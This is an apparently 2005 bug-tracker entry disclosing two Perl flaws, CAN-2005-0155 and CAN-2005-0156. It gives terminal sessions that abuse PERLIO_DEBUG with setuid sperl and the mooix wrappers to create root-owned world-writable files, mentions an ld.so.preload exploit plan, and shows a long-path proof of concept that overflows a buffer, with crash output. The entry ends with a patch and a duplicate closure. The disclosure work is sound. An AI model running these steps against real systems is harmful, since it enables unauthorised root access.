Two perl issues: PERLIO_DEBUG If set to the name of a file or device then certain operations of PerlIO sub-system will be logged to that file (opened as append). Typical uses are UNIX: ./perlio.c: void PerlIO_debug(const char *fmt, ...) { ... if (!dbg) { char *s = PerlEnv_getenv("PERLIO_DEBUG"); if (s && *s) dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666); else dbg = -1; } If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op. else you can do the following either via sperl or vial sperl: sperl: kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4 -rwsr-xr-x 1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4 kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa kfinisterre@jdam:~$ umask 001 kfinisterre@jdam:~$ /usr/bin/sperl5.8.4 sperl needs fd script You should not call sperl directly; do you need to change a #! line from sperl to perl? kfinisterre@jdam:~$ ls -al /tmp/aaa -rw-rw-rw- 1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa setuid wrapper: kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper /usr/sbin/mooregister /usr/sbin/moopasswd -rwsr-xr-x 1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc -rwsr-xr-x 1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd -rwsr-xr-x 1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister These are all setuid programs that invoke perl scripts. /usr/share/mooix/mooix-pty-helper.pl /usr/share/mooix/moopasswd.pl /usr/share/mooix/mooregister.pl kfinisterre@jdam:/tmp$ umask 001 kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2 kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22, <CONFIG> line 98. kfinisterre@jdam:/tmp$ ls -al /tmp/oops2 -rw-rw-rw- 1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2 kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3 /usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0 /usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0 /usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0 kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2 hrmmm... kfinisterre@jdam:~$ ls -al /etc/ld.so.preload ls: /etc/ld.so.preload: No such file or directory gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time. Second issue: While looking at the source code to figure out what the details of my PERLIO_DEBUG file overwrite bug I also found a buffer overflow... in perlio.c: if (dbg > 0) { dTHX; #ifdef USE_ITHREADS /* Use fixed buffer as sv_catpvf etc. needs SVs */ char buffer[1024]; char *s; STRLEN len; s = CopFILE(PL_curcop); if (!s) s = "(none)"; sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop)); Set PERLIO_DEBUG to anything make a perl script calling sperl and run it with the full path (after placing it in a long ass directory) #!/usr/bin/sperl5.8.4 print a; kfinisterre@jdam:/tmp$ /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl Segmentation fault stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory) ** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00] open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3 ** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c] --- SIGSEGV (Segmentation fault) @ 0 (0) --- upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
Created attachment 50060 [details, diff] perl-5.8.6-bug33990.patch Mandrake patch
CAN-2005-0155 for the privilege escalation in debug mode CAN-2005-0156 for the buffer overflow
This is public now on #bug 80460.
*** This bug has been marked as a duplicate of 80460 ***